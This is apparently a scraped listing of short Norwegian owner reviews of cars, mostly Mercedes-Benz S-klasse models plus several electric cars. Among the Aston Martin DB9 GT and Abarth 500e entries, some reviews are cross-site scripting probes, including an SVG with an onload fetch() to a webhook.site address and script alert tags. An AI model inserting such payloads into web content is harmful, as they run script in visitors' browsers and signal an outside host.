Mercedes-Benz S-klasse (2020)
Pålitelig, comfertabel, sikker og pen bil.
Mercedes-Benz S-klasse (2019)
En bil med bensin V8 er og blir en glede å kjøre
Mercedes-Benz S-klasse (2015)
En fantastisk bil å eie. Du kjøper ikke en slik bil av økonomiske årsaker, men at du vil flytte deg fra A til B på 1. klasse. Å det gjør du, så til de grader.
Mercedes-Benz S-klasse (2015)
En fantastisk bil som kun blir brukt til søndagskjøring
Mercedes-Benz S-klasse (2015)
Bedre er det vanskelig å ha det når man kjører bil........
Mercedes-Benz S-klasse (2012)
Har gått fra Tesla Model X til S-klasse da jeg var litt lei av støy og ladestopp. Strålende fornøyd. Savner akselerasjon og bagasjeplass, men ikke noe særlig annet. Opplevd kvalitet er nok endel
Mercedes-Benz S-klasse (2009)
Har aldri hatt en bedre bil. Dette er min 3. Mercedes-Benz S-klasse i lang utgave og det blir igsrantert kke den siste. Strålende på absolutt alle måter.
Mercedes-Benz S-klasse (2006)
Om man har interesse for overdådig luksus og mye langkjøring, så er dette absolutt bilen å velge. S-klasse er ikke noe man snakker om, det må prøves og oppleves! I Mercedes Hierarki så er de
Mercedes-Benz S-klasse (2006)
Veldig fornøyd med bilen,synd det ikke er kompetente mekanikere i bertel o steen som kan s klasse,har s klasse nr 2 nå,neste bil blir også en s klasse
Mercedes-Benz S-klasse (2006)
Dette er for meg den ultimate komfort og langturs bilen. Tidligere hadde jeg 2010 Audi A8 4,2 TDI quattro og det eneste jeg savner fra den er quattro. S-klassen er bedre på komfort, seter, ergonomi,
Mercedes-Benz S-klasse (2006)
En drømmebil for mange. Et mareritt for andre, men stort sett en meget behagelig måte å forflytte seg på.
Mercedes-Benz S-klasse (2001)
Komfort og utstyrsnivå som på nye biler. Solid kvalitet som blir enda bedre etter 2003
Mercedes-Benz S-klasse (2001)
Suveren bil med masse luksus, massasje, kjøling i tillegg til varme i seter, elektriske gardiner og alt man kan tenke seg. Den har til og med rader som holder avstand til forankjørende på cruisekon
Mercedes-Benz S-klasse (1999)
Nydelig tysk "båt". Myke linjer og god byggekvalitet gjør dette til en estetisk nydelig bil. Mange dulpeditter små kan gjøre en stor Å. En luksus bil med mange finesser. Mange små ting som kan
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km